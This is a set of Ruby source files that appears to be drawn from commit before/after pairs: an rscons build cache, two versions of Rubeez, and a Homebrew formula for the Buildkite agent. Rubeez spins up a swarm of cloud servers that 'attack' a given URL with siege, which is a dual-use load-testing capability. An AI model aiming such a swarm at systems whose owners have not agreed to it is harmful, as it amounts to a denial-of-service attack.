            "fname" => dep,
            "checksum" => lookup_checksum(dep),
          }
        end,
        "user_deps" => (env.get_user_deps(target) || []).map do |dep|
          {
            "fname" => dep,
            "checksum" => lookup_checksum(dep),
          }
        end,
      }
      @dirty = true
    end
  end

  # Return a list of targets that have been built.
  #
  # @return [Array<String>] List of targets that have been built.
  def targets
    @cache["targets"].keys
  end

  # Make any needed directories and record the ones that are created for
  # removal upon a "clean" operation.
  #
  # @param path [String] Directory to create.
  #
  # @return [void]
  def mkdir_p(path)
    parts = path.split(/[\\\/]/)
    parts.each_index do |i|
      next if parts[i] == ""
      subpath = File.join(*parts[0, i + 1])
      # File.exist? replaces File.exists?, which was deprecated and
      # removed in Ruby 3.2.
      unless File.exist?(subpath)
        FileUtils.mkdir(subpath)
        @cache["directories"][subpath] = true
        @dirty = true
      end
    end
  end

  # Return a list of directories which were created as a part of the build.
  #
  # @return [Array<String>]
  #   List of directories which were created as a part of the build.
  def directories
    @cache["directories"].keys
  end

  private

  # Return a String key based on the target name to use in the on-disk cache.
  #
  # @param target_name [Symbol, String]
  #   Target name.
  #
  # @return [String]
  #   Key name.
  def get_cache_key(target_name)
    if Rscons.phony_target?(target_name)
      PHONY_PREFIX + target_name.to_s
    else
      target_name
    end
  end

  # Create a Cache object and load in the previous contents from the cache
  # file.
  def initialize!
    # JSON.parse is used instead of JSON.load: JSON.load enables
    # create_additions, which can instantiate arbitrary objects from a
    # corrupt or tampered on-disk cache file.
    @cache = JSON.parse(File.read(CACHE_FILE)) rescue {}
    unless @cache.is_a?(Hash)
      $stderr.puts "Warning: #{CACHE_FILE} was corrupt. Contents:\n#{@cache.inspect}"
      @cache = {}
    end
    @cache["targets"] ||= {}
    @cache["directories"] ||= {}
    @cache["configuration_data"] ||= {}
    @lookup_checksums = {}
    @dirty = false
  end

  # Return a file's checksum, or the previously calculated checksum for
  # the same file.
  #
  # @param file [String] The file name.
  #
  # @return [String] The file's checksum.
  def lookup_checksum(file)
    @lookup_checksums[file] || calculate_checksum(file)
  end

  # Calculate and return a file's checksum.
  #
  # @param file [String] The file name.
  #
  # @return [String] The file's checksum, or "" if it cannot be read.
  def calculate_checksum(file)
    @lookup_checksums[file] = Digest::MD5.hexdigest(File.read(file, mode: "rb")) rescue ""
  end

  # Validate that an object is one of a known set of values that can be
  # serialized properly with JSON.
  #
  # @param o [Object]
  #   Object to validate.
  def validate_json_object(o)
    if o.is_a?(Array)
      o.each {|v| validate_json_object(v)}
    elsif o.is_a?(Hash)
      o.each {|*kv| validate_json_object(kv)}
    elsif [NilClass, TrueClass, FalseClass, String].none? {|c| o.is_a?(c)}
      raise "Unexpected cache value for serialization: #{o.inspect}"
    end
  end
end
end
|
# The MIT License
# Copyright (c) 2013 Ryan Walker
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
require 'rubeez'
require 'rubeez/application'
require 'rubeez/log'
require 'net/ssh'
require 'ruport'
require 'csv'
require 'fog'
require 'nokogiri'
require 'open-uri'
module Rubeez
# Drives a "swarm" of Rackspace cloud servers ("beez") that load-test a
# target URL with siege/ab, then averages and reports the results.
class Swarm
  def initialize
    super
  end

  # Run a full attack: verify the swarm, prepare each bee over SSH, run the
  # benchmark command on every bee in parallel, then report averaged
  # results and clean up the local result files.
  def attack
    threads = Array.new
    check_swarm_exists?
    check_url
    load_keys
    cmd = attack_command
    connection = create_connection
    beez = read_file(Rubeez::Config[:rubeez_file])
    beez.count.times do |i|
      threads[i] = Thread.new do
        server = connection.servers.get(beez[i])
        output = server.ssh(['chmod +x /tmp/rubeez_prepare.sh && bash /tmp/rubeez_prepare.sh', cmd],
          :key_data => Rubeez::Config[:private_key_data].to_s)
        Rubeez::Log.info("#{server.name}: Completed Attack")
      end
    end
    threads.each do |t|
      t.join
    end
    results = gather_reports
    Rubeez::Log.info("Results averaged across the entire swarm:")
    print_results(results)
    clean_up
  end

  # Build the shell command each bee will execute: write the URL list to
  # /tmp/urls.txt and run siege against it.
  def attack_command
    check_url
    get_headers
    # Fetch the target page once and reuse the result; previously
    # generate_content_urls was also called a second time inside the
    # string interpolation, issuing a redundant HTTP request.
    urls = generate_content_urls
    cmd = "echo -e \"#{urls}\" >> /tmp/urls.txt;"
    #cmd << "ab -e /tmp/rubeez.out -r -n #{Rubeez::Config[:requests]} -c #{Rubeez::Config[:concurrency]} -C 'sessionid=SomeSessionID' #{Rubeez::Config[:header_string]} '#{Rubeez::Config[:url]}'"
    cmd << "siege -r #{Rubeez::Config[:requests]} -c #{Rubeez::Config[:concurrency]} -f /tmp/urls.txt -l /tmp/rubeez.out"
    Rubeez::Log.info("Attacking #{Rubeez::Config[:url]} with the following command:")
    Rubeez::Log.info("#{cmd}")
    Rubeez::Log.info("If this is your first attack with this swarm, it may take a few minutes before starting")
    return cmd
  end

  # True when the swarm file exists and is non-empty; otherwise prints
  # instructions and exits via swarm_no_exist.
  def check_swarm_exists?
    if ((File.size?(Rubeez::Config[:rubeez_file]) > 0) rescue false)
      return true
    else
      swarm_no_exist
    end
  end

  # Normalize the configured URL: default the scheme to http:// and the
  # path to "/".
  def check_url
    uri = URI(Rubeez::Config[:url])
    if not uri.scheme
      uri = URI("http://" + Rubeez::Config[:url])
    end
    uri.path = "/" if uri.path.empty?
    Rubeez::Config[:url] = uri.to_s
  end

  # Delete the per-bee result files previously downloaded to /tmp.
  def clean_up
    beez = read_file(Rubeez::Config[:rubeez_file])
    files = beez.map {|x| "/tmp/#{x}.out"}
    Rubeez::Log.debug("Removing local results files")
    files.each do |file|
      File.delete(file)
      Rubeez::Log.debug("Deleted #{file}")
    end
  end

  # Truncate a file to zero length.
  def clear_file(file)
    File.open(file, 'w') {}
  end

  # Open a Fog compute connection to Rackspace using the configured
  # credentials.
  def create_connection
    connection = Fog::Compute.new({
      :provider => 'Rackspace',
      :rackspace_username => Rubeez::Config[:username],
      :rackspace_api_key => Rubeez::Config[:apikey],
      # :rackspace_region => Rubeez::Config[:region],
      :version => :v2
    })
    return connection
  end

  # Generate an RSA keypair at ~/.ssh/fog_rsa[.pub] unless the configured
  # keys already exist.
  def create_keys
    # File.exist? replaces File.exists?, which was deprecated and removed
    # in Ruby 3.2.
    unless File.exist?(File.expand_path(Rubeez::Config[:private_key])) and File.exist?(File.expand_path(Rubeez::Config[:public_key]))
      key = OpenSSL::PKey::RSA.new 2048
      type = key.ssh_type
      data = [ key.to_blob ].pack('m0')
      File.open(File.expand_path('~/.ssh/fog_rsa'), 'w') do |f|
        f.puts "#{key}"
      end
      File.open(File.expand_path('~/.ssh/fog_rsa.pub'), 'w') do |f|
        f.puts "#{type} #{data}"
      end
    end
  end

  # Boot a single Ubuntu 12.04 server, inject the SSH key and the prepare
  # script, and append the new server's id to the swarm file.
  def create_bee(connection, name)
    load_keys
    bee = connection.servers.create(
      :name => name,
      :flavor_id => connection.flavors.first.id,
      :image_id => connection.images.find {|img| img.name =~ /Ubuntu 12.04/}.id,
      :personality => [{
        :path => '/root/.ssh/authorized_keys',
        :contents => Base64.encode64(Rubeez::Config[:public_key_data].to_s)
      },
      {
        :path => '/tmp/rubeez_prepare.sh',
        :contents => Base64.encode64("#! /bin/bash\nif [ ! -f /tmp/rubeez_ready ]; then\napt-get update\napt-get install -y apache2-utils\napt-get install -y siege\ntouch /tmp/rubeez_ready\nfi")
      },
      ]
    )
    Rubeez::Log.info("Adding #{bee.name} to the swarm.")
    write_file(Rubeez::Config[:rubeez_file], bee.id)
    return bee
  end

  # Build a newline-separated URL list: the target page itself plus every
  # img and script src found on it.
  def generate_content_urls
    doc = Nokogiri::HTML(open("#{Rubeez::Config[:url]}"))
    urls = "#{Rubeez::Config[:url]}\n"
    doc.xpath("//img/@src").each do |script|
      urls << script << "\n"
    end
    doc.xpath("//script/@src").each do |script|
      urls << script << "\n"
    end
    return urls
  end

  # Create the configured number of bees, one thread per bee.
  def create_swarm
    beez = []
    threads = []
    if ((File.size?(Rubeez::Config[:rubeez_file]) > 0) rescue false)
      Rubeez::Log.info("Swarm already exists. Run 'rubeez --kill' to delete servers and start new swarm.")
      exit
    end
    connection = create_connection
    create_keys
    Rubeez::Log.info("Populating swarm - this may take some time")
    Rubeez::Log.info("-----------------------------------------")
    Rubeez::Config[:beez].to_i.times do |i|
      Rubeez::Log.info("Creating bee ##{i}")
      threads[i] = Thread.new do
        bee = create_bee(connection, "rubeez-worker-n#{i}")
        beez << bee
      end
    end
    threads.each do |t|
      t.join
    end
    Rubeez::Log.info("Swarm Created:")
    beez.each {|bee| Rubeez::Log.info("#{bee.name}: #{bee.id}")}
    Rubeez::Log.info("Use 'rubeez -s' to check status.")
  end

  # SCP each bee's result file locally, then average every numeric row
  # across all bees' CSV reports.
  def gather_reports
    threads = Array.new
    beez = read_file(Rubeez::Config[:rubeez_file])
    connection = create_connection
    beez.count.times do |i|
      threads[i] = Thread.new do
        server = connection.servers.get(beez[i])
        Fog::SCP.new(server.ipv4_address, 'root',
          {:key_data => Rubeez::Config[:private_key_data].to_s}).download(
          '/tmp/rubeez.out', "/tmp/#{beez[i]}.out", {})
      end
    end
    threads.each do |t|
      t.join
    end
    files = beez.map {|x| "/tmp/#{x}.out"}
    data = Array.new
    files.each do |file|
      data << CSV.read(file)
    end
    # NOTE: `average` aliases data[0]; rows of the first report are
    # mutated in place to hold the collected, then averaged, values.
    average = data[0]
    data[0].count.times do |j|
      unless data[0][j][0].include?('Percentage')
        c = Array.new
        data.each do |file|
          unless c[j].nil?
            c[j] << file[j][1]
          else
            c[j] = *file[j][1]
          end
        end
        average[j][1] = c[j]
      end
    end
    average.count.times do |i|
      unless average[i][0].include?('Percentage')
        average[i][1].count.times do |j|
          average[i][1][j] = average[i][1][j].to_f
        end
        average[i][1] = average[i][1].instance_eval { reduce(:+) / size.to_f }.round(4)
      end
    end
    return average
  end

  # Build the extra -H header string for the benchmark command.
  def get_headers
    Rubeez::Config[:header_string] = ''
    # NOTE(review): the guard reads :headers but the split reads :header —
    # one of these keys is likely wrong; confirm which key the option
    # parser actually sets before changing.
    if Rubeez::Config[:headers] != ''
      Rubeez::Config[:header].split(';').each do |header|
        Rubeez::Config[:header_string] += ' -H ' + header
      end
    end
  end

  # Destroy every server in the swarm in parallel, then truncate the
  # swarm file.
  def kill_swarm
    threads = Array.new
    connection = create_connection
    beez = read_file(Rubeez::Config[:rubeez_file])
    Rubeez::Log.info("Killing swarm...")
    beez.count.times do |i|
      threads[i] = Thread.new do
        connection.servers.destroy(beez[i])
        Rubeez::Log.info("Killed bee #{beez[i]}")
      end
    end
    threads.each do |t|
      t.join
    end
    clear_file(Rubeez::Config[:rubeez_file])
    Rubeez::Log.info("Swarm killed.")
  end

  # Load the configured SSH keypair contents into the config.
  def load_keys
    Rubeez::Config[:private_key_data] = File.read File.expand_path(Rubeez::Config[:private_key])
    Rubeez::Config[:public_key_data] = File.read File.expand_path(Rubeez::Config[:public_key])
  end

  # Render the averaged results (from gather_reports) as a text table.
  def print_results(results)
    table = Table(%w[percentage_served time_in_ms])
    results.drop(1).each do |row|
      table << { "percentage_served" => row[0], "time_in_ms" => row[1] }
    end
    Rubeez::Log.info("\n#{table.to_text}")
  end

  # Read a file into an Array of stripped lines.
  def read_file(file)
    contents = IO.readlines file
    contents.each do |line|
      line.strip!
    end
    return contents
  end

  # Log each bee's build state and summarize overall swarm readiness.
  def status
    status = Array.new
    check_swarm_exists?
    beez = read_file(Rubeez::Config[:rubeez_file])
    connection = create_connection
    beez.each do |id|
      bee = connection.servers.get(id)
      status << bee.state
      Rubeez::Log.info("#{bee.name}: #{bee.state} - #{bee.progress}")
    end
    unless status.include?("BUILD") or status.include?("ERROR")
      Rubeez::Log.info("All beez ready! Swarm is complete. Run 'rubeez --attack --url [TARGET]'")
    else
      Rubeez::Log.info("Swarm still forming. #{status.count {|x| x == 'ACTIVE'}} out of #{status.count} complete.")
    end
  end

  def swarm
    create_swarm
  end

  # Print creation instructions and exit (swarm file missing or empty).
  def swarm_no_exist
    Rubeez::Log.info("Swarm has not been populated yet. Run rubeez -u [USERNAME] -a [APIKEY] -b [NUM_OF_BEEZ] to create it.")
    exit
  end

  # Print a not-ready message and exit.
  def swarm_not_ready
    Rubeez::Log.info("Swarm not fully populated. Run 'rubeez -s' for status.")
    exit
  end

  # Exit via the appropriate helper unless every bee reports ready.
  def swarm_ready?
    if check_swarm_exists?
      connection = create_connection
      beez = read_file(Rubeez::Config[:rubeez_file])
      beez.each do |id|
        bee = connection.servers.get(id)
        if !bee.ready?
          swarm_not_ready
        end
      end
    else
      swarm_no_exist
    end
  end

  # Append a line of data to a file.
  def write_file(file, data)
    File.open(File.expand_path(file), 'a') {|f| f.write(data + "\n") }
  end
end
end
Gathering stats from siege.
# The MIT License
# Copyright (c) 2013 Ryan Walker
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
require 'rubeez'
require 'rubeez/application'
require 'rubeez/log'
require 'net/ssh'
require 'net/scp'
require 'ruport'
require 'csv'
require 'fog'
require 'nokogiri'
require 'open-uri'
module Rubeez
# Drives a "swarm" of Rackspace cloud servers ("beez") that load-test a
# target URL with siege, then sums the final summary row of each bee's
# log and reports per-bee averages.
class Swarm
  def initialize
    super
  end

  # Run a full attack: verify the swarm, prepare each bee over SSH, run
  # siege on every bee in parallel, then report averaged results and clean
  # up the local result files.
  def attack
    threads = Array.new
    check_swarm_exists?
    check_url
    load_keys
    cmd = attack_command
    connection = create_connection
    beez = read_file(Rubeez::Config[:rubeez_file])
    beez.count.times do |i|
      threads[i] = Thread.new do
        server = connection.servers.get(beez[i])
        output = server.ssh(['chmod +x /tmp/rubeez_prepare.sh && bash /tmp/rubeez_prepare.sh', cmd],
          :key_data => Rubeez::Config[:private_key_data].to_s)
        Rubeez::Log.info("#{server.name}: Completed Attack")
      end
    end
    threads.each do |t|
      t.join
    end
    results = gather_reports
    Rubeez::Log.info("Results averaged across the entire swarm:")
    print_results(results)
    clean_up
  end

  # Build the shell command each bee will execute: write the URL list to
  # /tmp/urls.txt and run siege against it, logging to /tmp/rubeez.out.
  def attack_command
    check_url
    get_headers
    # Fetch the target page once and reuse the result; previously
    # generate_content_urls was also called a second time inside the
    # string interpolation, issuing a redundant HTTP request.
    urls = generate_content_urls
    cmd = "echo -e \"#{urls}\" >> /tmp/urls.txt;"
    cmd << "siege -r #{Rubeez::Config[:requests]} -c #{Rubeez::Config[:concurrency]} --log=/tmp/rubeez.out -f /tmp/urls.txt"
    Rubeez::Log.info("Attacking #{Rubeez::Config[:url]}...")
    Rubeez::Log.info("If this is your first attack with this swarm, it may take a few minutes before starting")
    return cmd
  end

  # True when the swarm file exists and is non-empty; otherwise prints
  # instructions and exits via swarm_no_exist.
  def check_swarm_exists?
    if ((File.size?(Rubeez::Config[:rubeez_file]) > 0) rescue false)
      return true
    else
      swarm_no_exist
    end
  end

  # Normalize the configured URL: default the scheme to http:// and the
  # path to "/".
  def check_url
    uri = URI(Rubeez::Config[:url])
    if not uri.scheme
      uri = URI("http://" + Rubeez::Config[:url])
    end
    uri.path = "/" if uri.path.empty?
    Rubeez::Config[:url] = uri.to_s
  end

  # Delete the per-bee result files previously downloaded to /tmp.
  def clean_up
    beez = read_file(Rubeez::Config[:rubeez_file])
    files = beez.map {|x| "/tmp/#{x}.out"}
    Rubeez::Log.debug("Removing local results files")
    files.each do |file|
      File.delete(file)
      Rubeez::Log.debug("Deleted #{file}")
    end
  end

  # Truncate a file to zero length.
  def clear_file(file)
    File.open(file, 'w') {}
  end

  # Open a Fog compute connection to Rackspace using the configured
  # credentials.
  def create_connection
    connection = Fog::Compute.new({
      :provider => 'Rackspace',
      :rackspace_username => Rubeez::Config[:username],
      :rackspace_api_key => Rubeez::Config[:apikey],
      # :rackspace_region => Rubeez::Config[:region],
      :version => :v2
    })
    return connection
  end

  # Generate an RSA keypair at ~/.ssh/fog_rsa[.pub] unless the configured
  # keys already exist.
  def create_keys
    # File.exist? replaces File.exists?, which was deprecated and removed
    # in Ruby 3.2.
    unless File.exist?(File.expand_path(Rubeez::Config[:private_key])) and File.exist?(File.expand_path(Rubeez::Config[:public_key]))
      key = OpenSSL::PKey::RSA.new 2048
      type = key.ssh_type
      data = [ key.to_blob ].pack('m0')
      File.open(File.expand_path('~/.ssh/fog_rsa'), 'w') do |f|
        f.puts "#{key}"
      end
      File.open(File.expand_path('~/.ssh/fog_rsa.pub'), 'w') do |f|
        f.puts "#{type} #{data}"
      end
    end
  end

  # Boot a single Ubuntu 12.04 server, inject the SSH key and the prepare
  # script, and append the new server's id to the swarm file.
  def create_bee(connection, name)
    load_keys
    bee = connection.servers.create(
      :name => name,
      :flavor_id => connection.flavors.first.id,
      :image_id => connection.images.find {|img| img.name =~ /Ubuntu 12.04/}.id,
      :personality => [{
        :path => '/root/.ssh/authorized_keys',
        :contents => Base64.encode64(Rubeez::Config[:public_key_data].to_s)
      },
      {
        :path => '/tmp/rubeez_prepare.sh',
        :contents => Base64.encode64("#! /bin/bash\nif [ ! -f /tmp/rubeez_ready ]; then\napt-get update\napt-get install -y apache2-utils\napt-get install -y siege\ntouch /tmp/rubeez_ready\nfi")
      },
      ]
    )
    Rubeez::Log.info("Adding #{bee.name} to the swarm.")
    write_file(Rubeez::Config[:rubeez_file], bee.id)
    return bee
  end

  # Build a newline-separated URL list: the target page itself plus every
  # img and script src found on it.
  def generate_content_urls
    doc = Nokogiri::HTML(open("#{Rubeez::Config[:url]}"))
    urls = "#{Rubeez::Config[:url]}\n"
    doc.xpath("//img/@src").each do |script|
      urls << script << "\n"
    end
    doc.xpath("//script/@src").each do |script|
      urls << script << "\n"
    end
    return urls
  end

  # Create the configured number of bees, one thread per bee.
  def create_swarm
    beez = []
    threads = []
    if ((File.size?(Rubeez::Config[:rubeez_file]) > 0) rescue false)
      Rubeez::Log.info("Swarm already exists. Run 'rubeez --kill' to delete servers and start new swarm.")
      exit
    end
    connection = create_connection
    create_keys
    Rubeez::Log.info("Populating swarm - this may take some time")
    Rubeez::Log.info("-----------------------------------------")
    Rubeez::Config[:beez].to_i.times do |i|
      Rubeez::Log.info("Creating bee ##{i}")
      threads[i] = Thread.new do
        bee = create_bee(connection, "rubeez-worker-n#{i}")
        beez << bee
      end
    end
    threads.each do |t|
      t.join
    end
    Rubeez::Log.info("Swarm Created:")
    beez.each {|bee| Rubeez::Log.info("#{bee.name}: #{bee.id}")}
    Rubeez::Log.info("Use 'rubeez -s' to check status.")
  end

  # SCP each bee's siege log locally, then sum the fields of each log's
  # final summary row into a single Hash (divided back out by "count" in
  # print_results).
  def gather_reports
    threads = Array.new
    beez = read_file(Rubeez::Config[:rubeez_file])
    connection = create_connection
    beez.count.times do |i|
      threads[i] = Thread.new do
        server = connection.servers.get(beez[i])
        Net::SCP.download!(server.ipv4_address, 'root',
          '/tmp/rubeez.out', "/tmp/#{beez[i]}.out",
          :ssh => {
            :keys => File.expand_path(Rubeez::Config[:private_key])
          })
      end
    end
    threads.each do |t|
      t.join
    end
    files = beez.map {|x| "/tmp/#{x}.out"}
    data = Hash.new(0)
    files.each do |file|
      # File.readlines replaces File.open(file).readlines, which leaked an
      # open file handle.
      f = File.readlines(file)
      f.each do |readline|
        # Only the final summary row of each siege log is parsed:
        # readline[f.last] is truthy only when the current line contains
        # the file's last line.
        if readline[f.last]
          csv_data = CSV.parse(readline)
          data["count"] += 1
          data["elap_time"] += csv_data[0][2].to_f
          data["resp_time"] += csv_data[0][4].to_f
          data["trans_rate"] += csv_data[0][5].to_f
          data["concurrent"] += csv_data[0][7].to_f
          data["okay"] += csv_data[0][8].to_f
          data["failed"] += csv_data[0][9].to_f
        end
      end
    end
    return data
  end

  # Build the extra -H header string for the benchmark command.
  def get_headers
    Rubeez::Config[:header_string] = ''
    # NOTE(review): the guard reads :headers but the split reads :header —
    # one of these keys is likely wrong; confirm which key the option
    # parser actually sets before changing.
    if Rubeez::Config[:headers] != ''
      Rubeez::Config[:header].split(';').each do |header|
        Rubeez::Config[:header_string] += ' -H ' + header
      end
    end
  end

  # Destroy every server in the swarm in parallel, then truncate the
  # swarm file.
  def kill_swarm
    threads = Array.new
    connection = create_connection
    beez = read_file(Rubeez::Config[:rubeez_file])
    Rubeez::Log.info("Killing swarm...")
    beez.count.times do |i|
      threads[i] = Thread.new do
        connection.servers.destroy(beez[i])
        Rubeez::Log.info("Killed bee #{beez[i]}")
      end
    end
    threads.each do |t|
      t.join
    end
    clear_file(Rubeez::Config[:rubeez_file])
    Rubeez::Log.info("Swarm killed.")
  end

  # Load the configured SSH keypair contents into the config.
  def load_keys
    Rubeez::Config[:private_key_data] = File.read File.expand_path(Rubeez::Config[:private_key])
    Rubeez::Config[:public_key_data] = File.read File.expand_path(Rubeez::Config[:public_key])
  end

  # Render the summed siege stats as per-bee averages; each value is
  # divided by the number of parsed reports ("count").
  def print_results(results)
    table = Table(%w[stats average])
    Rubeez::Log.info(results['count'])
    # drop(1) skips the leading "count" entry, relying on the Hash
    # insertion order established in gather_reports.
    results.drop(1).each do |row|
      table << [ row[0], (row[1].to_f / results['count'].to_f).to_s[0..4]]
    end
    Rubeez::Log.info("\n#{table.to_text}")
  end

  # Read a file into an Array of stripped lines.
  def read_file(file)
    contents = IO.readlines file
    contents.each do |line|
      line.strip!
    end
    return contents
  end

  # Log each bee's build state and summarize overall swarm readiness.
  def status
    status = Array.new
    check_swarm_exists?
    beez = read_file(Rubeez::Config[:rubeez_file])
    connection = create_connection
    beez.each do |id|
      bee = connection.servers.get(id)
      status << bee.state
      Rubeez::Log.info("#{bee.name}: #{bee.state} - #{bee.progress}")
    end
    unless status.include?("BUILD") or status.include?("ERROR")
      Rubeez::Log.info("All beez ready! Swarm is complete. Run 'rubeez --attack --url [TARGET]'")
    else
      Rubeez::Log.info("Swarm still forming. #{status.count {|x| x == 'ACTIVE'}} out of #{status.count} complete.")
    end
  end

  def swarm
    create_swarm
  end

  # Print creation instructions and exit (swarm file missing or empty).
  def swarm_no_exist
    Rubeez::Log.info("Swarm has not been populated yet. Run rubeez -u [USERNAME] -a [APIKEY] -b [NUM_OF_BEEZ] to create it.")
    exit
  end

  # Print a not-ready message and exit.
  def swarm_not_ready
    Rubeez::Log.info("Swarm not fully populated. Run 'rubeez -s' for status.")
    exit
  end

  # Exit via the appropriate helper unless every bee reports ready.
  def swarm_ready?
    if check_swarm_exists?
      connection = create_connection
      beez = read_file(Rubeez::Config[:rubeez_file])
      beez.each do |id|
        bee = connection.servers.get(id)
        if !bee.ready?
          swarm_not_ready
        end
      end
    else
      swarm_no_exist
    end
  end

  # Append a line of data to a file.
  def write_file(file, data)
    File.open(File.expand_path(file), 'a') {|f| f.write(data + "\n") }
  end
end
end
|
class BuildkiteAgent < Formula
desc "Build runner for use with Buildkite"
homepage "https://buildkite.com/docs/agent"
stable do
version "3.22.0"
url "https://github.com/buildkite/agent/releases/download/v3.22.0/buildkite-agent-darwin-amd64-3.22.0.tar.gz"
sha256 "cef4b13cee84119ea2a4853fb161e967de02a9c63f67ea3c1c4d1cd514e5059e"
end
option "token=", "Your account's agent token to add to the config on install"
def default_agent_token
"xxx"
end
def agent_token
ARGV.value("token") || default_agent_token
end
def agent_etc
etc/"buildkite-agent"
end
def agent_var
var/"buildkite-agent"
end
def agent_hooks_path
agent_etc/"hooks"
end
def agent_builds_path
agent_var/"builds"
end
def agent_plugins_path
agent_var/"plugins"
end
def agent_bootstrap_path
if stable?
agent_etc/"bootstrap.sh"
else
opt_bin/"buildkite-agent bootstrap"
end
end
def agent_config_path
agent_etc/"buildkite-agent.cfg"
end
def agent_config_dist_path
pkgshare/"buildkite-agent.dist.cfg"
end
def install
agent_etc.mkpath
agent_var.mkpath
pkgshare.mkpath
agent_hooks_path.mkpath
agent_builds_path.mkpath
agent_hooks_path.install Dir["hooks/*"]
if stable?
agent_etc.install "bootstrap.sh"
end
agent_config_dist_path.write(default_config_file)
if agent_config_path.exist?
puts "\033[35mIgnoring existing config file at #{agent_config_path}\033[0m"
puts "\033[35mFor changes see the updated dist copy at #{agent_config_dist_path}\033[0m"
else
agent_config_path.write(default_config_file(agent_token))
end
bin.install "buildkite-agent"
end
def default_config_file(agent_token = default_agent_token)
File.read("buildkite-agent.cfg")
.gsub(/token=.+/, "token=\"#{agent_token}\"")
.gsub(/bootstrap-script=.+/, "bootstrap-script=\"#{agent_bootstrap_path}\"")
.gsub(/build-path=.+/, "build-path=\"#{agent_builds_path}\"")
.gsub(/hooks-path=.+/, "hooks-path=\"#{agent_hooks_path}\"")
.gsub(/plugins-path=.+/, "plugins-path=\"#{agent_plugins_path}\"")
end
def caveats
<<~EOS
\033[32mbuildkite-agent is now installed!\033[0m#{agent_token_reminder}
Configuration file (to configure agent meta-data, priority, name, etc):
#{agent_config_path}
Hooks directory (for customising the agent):
#{agent_hooks_path}
Builds directory:
#{agent_builds_path}
Log paths:
#{var}/log/buildkite-agent.log
#{var}/log/buildkite-agent.error.log
If you set up the LaunchAgent, set your machine to auto-login as
your current user. It's also recommended to install Caffeine
(http://lightheadsw.com/caffeine/) to prevent your machine from going to
sleep or logging out.
To run multiple agents simply run the buildkite-agent start command
multiple times, or duplicate the LaunchAgent plist to create another
that starts on login.
EOS
end
plist_options :manual => "buildkite-agent start"
# LaunchAgent definition: runs `buildkite-agent start` at load, restarts on
# unclean exit with a 30s throttle.
# NOTE(review): StandardErrorPath points at the same file as StandardOutPath,
# but caveats advertises a separate buildkite-agent.error.log — confirm which
# is intended.
def plist
  <<~EOS
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
    <key>Label</key>
    <string>#{plist_name}</string>
    <key>WorkingDirectory</key>
    <string>#{HOMEBREW_PREFIX}/bin</string>
    <key>ProgramArguments</key>
    <array>
    <string>#{HOMEBREW_PREFIX}/bin/buildkite-agent</string>
    <string>start</string>
    <string>--config</string>
    <string>#{agent_config_path}</string>
    <!--<string>--debug</string>-->
    </array>
    <key>EnvironmentVariables</key>
    <dict>
    <key>PATH</key>
    <string>#{HOMEBREW_PREFIX}/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin</string>
    </dict>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <dict>
    <key>SuccessfulExit</key>
    <false/>
    </dict>
    <key>ProcessType</key>
    <string>Interactive</string>
    <key>ThrottleInterval</key>
    <integer>30</integer>
    <key>StandardOutPath</key>
    <string>#{var}/log/buildkite-agent.log</string>
    <key>StandardErrorPath</key>
    <string>#{var}/log/buildkite-agent.log</string>
    </dict>
    </plist>
  EOS
end
# Returns a red reminder string when the installed config still contains the
# placeholder token; "" when no config exists; nil when a real token is set.
def agent_token_reminder
  return "" unless agent_config_path.exist?
  if agent_config_path.read.include?(default_agent_token)
    "\n \n \033[31mDon't forget to update your configuration file with your agent token\033[0m"
  end
end
# Smoke test: the installed binary responds to --help.
test do
  system "#{bin}/buildkite-agent", "--help"
end
end
fix(ARGV): Homebrew v2.3.0 EOLd various ARGV APIs
Related Links:
- https://github.com/buildkite/homebrew-buildkite/issues/15
- https://github.com/Homebrew/brew/pull/7538
- https://github.com/Homebrew/brew/releases/tag/2.3.0
---
# Homebrew formula for the Buildkite agent: installs the binary, a config
# file (preserving user edits on upgrade), hook/build/plugin directories,
# and a LaunchAgent definition so the agent can run on login.
class BuildkiteAgent < Formula
  desc "Build runner for use with Buildkite"
  homepage "https://buildkite.com/docs/agent"

  stable do
    version "3.22.0"
    url "https://github.com/buildkite/agent/releases/download/v3.22.0/buildkite-agent-darwin-amd64-3.22.0.tar.gz"
    sha256 "cef4b13cee84119ea2a4853fb161e967de02a9c63f67ea3c1c4d1cd514e5059e"
  end

  option "token=", "Your account's agent token to add to the config on install"

  # Placeholder written to the config when no --token= is given.
  def default_agent_token
    "xxx"
  end

